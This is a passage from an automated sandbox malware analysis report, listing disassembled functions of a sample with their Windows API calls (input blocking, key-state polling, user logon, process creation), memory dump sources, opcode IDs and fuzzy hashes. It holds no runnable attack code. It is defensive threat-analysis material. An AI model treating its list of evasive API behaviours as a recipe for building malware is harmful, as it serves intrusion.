                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __itow__swprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 674341424-0
                                                                                                                  • Opcode ID: 226797e1349a47b984b2770ed3159f599eaf0317d836285ef8e9851314e47146
                                                                                                                  • Instruction ID: 5710552b95c078a08ecd6476e90a0cff8733958de3b4f6024ca4fe8f9f944972
                                                                                                                  • Opcode Fuzzy Hash: 226797e1349a47b984b2770ed3159f599eaf0317d836285ef8e9851314e47146
                                                                                                                  • Instruction Fuzzy Hash: F822AB716083409FD724EF25C8A0B6FB7E4EF84314F14492DF99A97291DB71E948CBA2
                                                                                                                  Function 00E1038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2743877c72d54a088e06d655263e70225a0562f9ca6096d02e4dd17ad5dd7739
                                                                                                                  • Instruction ID: 122f8f4037ab2f27e9d4eb50403de529215778ea8d0992c7b6a228c16500e155
                                                                                                                  • Opcode Fuzzy Hash: 2743877c72d54a088e06d655263e70225a0562f9ca6096d02e4dd17ad5dd7739
                                                                                                                  • Instruction Fuzzy Hash: 31B1DF21D2AF414DD223963A8831336B69CBFBB2D5F91D71BFC2A74D62EB6185C74180
                                                                                                                  Function 00E2B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __time64.LIBCMT ref: 00E2B6DF
                                                                                                                    • Part of subcall function 00E0344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E2BDC3,00000000,?,?,?,?,00E2BF70,00000000,?), ref: 00E03453
                                                                                                                    • Part of subcall function 00E0344A: __aulldiv.LIBCMT ref: 00E03473
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2893107130-0
                                                                                                                  • Opcode ID: e03362fe768bef049aa4a5a9f1bf8ee5d0579bcafd3e0697480d01400f1e3c79
                                                                                                                  • Instruction ID: 28f44fc3ac661b107f267a3e10d086a92a53f887f319cdc81c41f305fec17ddc
                                                                                                                  • Opcode Fuzzy Hash: e03362fe768bef049aa4a5a9f1bf8ee5d0579bcafd3e0697480d01400f1e3c79
                                                                                                                  • Instruction Fuzzy Hash: C6219072634510CBCB29CF39D481A52B7E1EB99310B248E6DE0E5DB2C1CB74B909CB54
                                                                                                                  Function 00E5044C Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00E504F4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  • Opcode ID: ac70f70ab71a71daac7c92d8b6c1128f532896845dad0664acf17f5850810e4a
                                                                                                                  • Instruction ID: 2c2461abb6ac46015846d5d30dce5d5e8450053cec1c30ed79f9938220d83359
                                                                                                                  • Opcode Fuzzy Hash: ac70f70ab71a71daac7c92d8b6c1128f532896845dad0664acf17f5850810e4a
                                                                                                                  • Instruction Fuzzy Hash: 4B110631204225BAFB244A28DD06FBD3654DB85B25F249B15FF32BA5E2CAA45D0492A4
                                                                                                                  Function 00E500AF Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB526: GetWindowLongW.USER32(?,000000EB), ref: 00DFB537
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00E5E467,?,?,?,?,00000000,?), ref: 00E50127
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  • Opcode ID: 6bbdf7847b5ae1d5b291e23219654d737aea743f78b618e1faeda768c20119a4
                                                                                                                  • Instruction ID: 7e3fcb24701a7590c9bf3408d3e00ee5fefaf27e354c58928c6ac4b7a98b2825
                                                                                                                  • Opcode Fuzzy Hash: 6bbdf7847b5ae1d5b291e23219654d737aea743f78b618e1faeda768c20119a4
                                                                                                                  • Instruction Fuzzy Hash: 1C012831A00114AFDF148F25DD0ABFA3B92EF8536AF045555FD557B192C331AC14D761
                                                                                                                  Function 00E4E9AF Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB526: GetWindowLongW.USER32(?,000000EB), ref: 00DFB537
                                                                                                                  • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00E4E9F5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CallLongProc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4084987330-0
                                                                                                                  • Opcode ID: 146040b9492007d10088af586af41067b4c06ba80ac1613279c592a1710a7615
                                                                                                                  • Instruction ID: 00291a8e585d8f427f4792c8b0d5404230fe88fc66ce036067cf60d106adec2d
                                                                                                                  • Opcode Fuzzy Hash: 146040b9492007d10088af586af41067b4c06ba80ac1613279c592a1710a7615
                                                                                                                  • Instruction Fuzzy Hash: 0CF03C31204108EFCB159F55FC00CB93BA6FB49360B049555FE15AB6A1C772A860EB61
                                                                                                                  Function 00E4EC7C Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                    • Part of subcall function 00DFB63C: GetCursorPos.USER32(000000FF), ref: 00DFB64F
                                                                                                                    • Part of subcall function 00DFB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00DFB66C
                                                                                                                    • Part of subcall function 00DFB63C: GetAsyncKeyState.USER32(00000001), ref: 00DFB691
                                                                                                                    • Part of subcall function 00DFB63C: GetAsyncKeyState.USER32(00000002), ref: 00DFB69F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00E5E514,?,?,?,?,?,00000001,?), ref: 00E4ECCA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2356834413-0
                                                                                                                  • Opcode ID: 74e8c050fa805d2fe5049ed82c991708155c554ed47d51159307606200fb33df
                                                                                                                  • Instruction ID: 52c4d8f4bc04b368ef974a8aba02f8d960b1a50bcbf16f3a593e7da851ea7431
                                                                                                                  • Opcode Fuzzy Hash: 74e8c050fa805d2fe5049ed82c991708155c554ed47d51159307606200fb33df
                                                                                                                  • Instruction Fuzzy Hash: B9F0A730200228EFDF145F05DC06EBE3B55EB45750F084055F9066A291C771A9A0DBE0
                                                                                                                  Function 00DFAAFC Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 00DFAB45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  • Opcode ID: 0f3a8cb58e5f211a5eb4963c8c77eadf50e965e14b49df081ea9676fe7476175
                                                                                                                  • Instruction ID: f113cb30c2f8577caee416a8a2457aa16b5c824a5af8d684748435d129f40bb9
                                                                                                                  • Opcode Fuzzy Hash: 0f3a8cb58e5f211a5eb4963c8c77eadf50e965e14b49df081ea9676fe7476175
                                                                                                                  • Instruction Fuzzy Hash: 0DF0E234600219DFDB188F09DC11A393BA2FB89361F048259FD129B2B0D771E950DB60
                                                                                                                  Function 00E36AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • BlockInput.USER32(00000001), ref: 00E36ACA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BlockInput
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3456056419-0
                                                                                                                  • Opcode ID: 8b32928ab5420180dd1e02e56e4a3b3fa6828dd9e890935cf230076ff8273dfd
                                                                                                                  • Instruction ID: 1c2219847a6070619fe9e3a1849945a438f7db974a33b2e3ef6c60c90f8be35d
                                                                                                                  • Opcode Fuzzy Hash: 8b32928ab5420180dd1e02e56e4a3b3fa6828dd9e890935cf230076ff8273dfd
                                                                                                                  • Instruction Fuzzy Hash: A7E012352002046FC700EB69D80499ABBEDEF68751F05C416EA45E7291DAB0E8048BA0
                                                                                                                  Function 00E274E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00E2750A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: mouse_event
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2434400541-0
                                                                                                                  • Opcode ID: c2913811aaa9b56aaf277722fd12682f596aded725af15aff83f2f9f99f4cbf3
                                                                                                                  • Instruction ID: e96874eb1acc73350861a945c831f365faa18bf82504c2101a214fad25c984b1
                                                                                                                  • Opcode Fuzzy Hash: c2913811aaa9b56aaf277722fd12682f596aded725af15aff83f2f9f99f4cbf3
                                                                                                                  • Instruction Fuzzy Hash: EED09EA41AC62579EC191724BC1BFB75508F304795FD46549B693F90C0A8D45D05E031
                                                                                                                  Function 00E4F609 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00E4F649
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3239928679-0
                                                                                                                  • Opcode ID: 16e8c0bc3f39a0dac29dd466acc7389f71d7ead05be735811ff0dd80e31bd0b2
                                                                                                                  • Instruction ID: 7fc8f10505d4bd2d8efe220e7c5261aa940a4e852c435a715cd897d72716b906
                                                                                                                  • Opcode Fuzzy Hash: 16e8c0bc3f39a0dac29dd466acc7389f71d7ead05be735811ff0dd80e31bd0b2
                                                                                                                  • Instruction Fuzzy Hash: AEF03931605294AFDB219E58EC15FC67B99AB5A720F084085BA11672E1CA707820DBA0
                                                                                                                  Function 00DFAB4F Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00DFAB7D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  • Opcode ID: ddb522e41d92c4041e3100c8f40caf60dc85ace5ebb98e0f204734481031c9c7
                                                                                                                  • Instruction ID: 20e79fb0f539d7b8d3978697670d7c1afffd345db1dfcecb6835ca489fb0da0d
                                                                                                                  • Opcode Fuzzy Hash: ddb522e41d92c4041e3100c8f40caf60dc85ace5ebb98e0f204734481031c9c7
                                                                                                                  • Instruction Fuzzy Hash: 42E01235644208FFCF15AF91DC12E693F2AEB8D364F148099F6059F2A1CB73A522DB60
                                                                                                                  Function 00E1B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E1AD3E), ref: 00E1B124
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LogonUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1244722697-0
                                                                                                                  • Opcode ID: 528220b9ee93b1492a6d002afe82096eb384b8ce86d8f35d0dfc03402f6d079e
                                                                                                                  • Instruction ID: 5911990309201c4c5ba5d6dad44642049349db4ea56be3c8d4650d5fc315f7a5
                                                                                                                  • Opcode Fuzzy Hash: 528220b9ee93b1492a6d002afe82096eb384b8ce86d8f35d0dfc03402f6d079e
                                                                                                                  • Instruction Fuzzy Hash: CAD05E321A864EAEDF024FA4EC02EAF3F6AEB04700F408110FA11D50A0C671D531AB50
                                                                                                                  Function 00E4F654 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00E5E4D1,?,?,?,?,?,?), ref: 00E4F67F
                                                                                                                    • Part of subcall function 00E4E32E: _memset.LIBCMT ref: 00E4E33D
                                                                                                                    • Part of subcall function 00E4E32E: _memset.LIBCMT ref: 00E4E34C
                                                                                                                    • Part of subcall function 00E4E32E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EA3D00,00EA3D44), ref: 00E4E37B
                                                                                                                    • Part of subcall function 00E4E32E: CloseHandle.KERNEL32 ref: 00E4E38D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2364484715-0
                                                                                                                  • Opcode ID: 736a7ef94f490f3a5801daedf674d023dc4c3e89be6a7daff65588a16d6831e0
                                                                                                                  • Instruction ID: 754158c522b6a8e05bf3c6b811547f80edaee549afb0063eeffeb9dba91242de
                                                                                                                  • Opcode Fuzzy Hash: 736a7ef94f490f3a5801daedf674d023dc4c3e89be6a7daff65588a16d6831e0
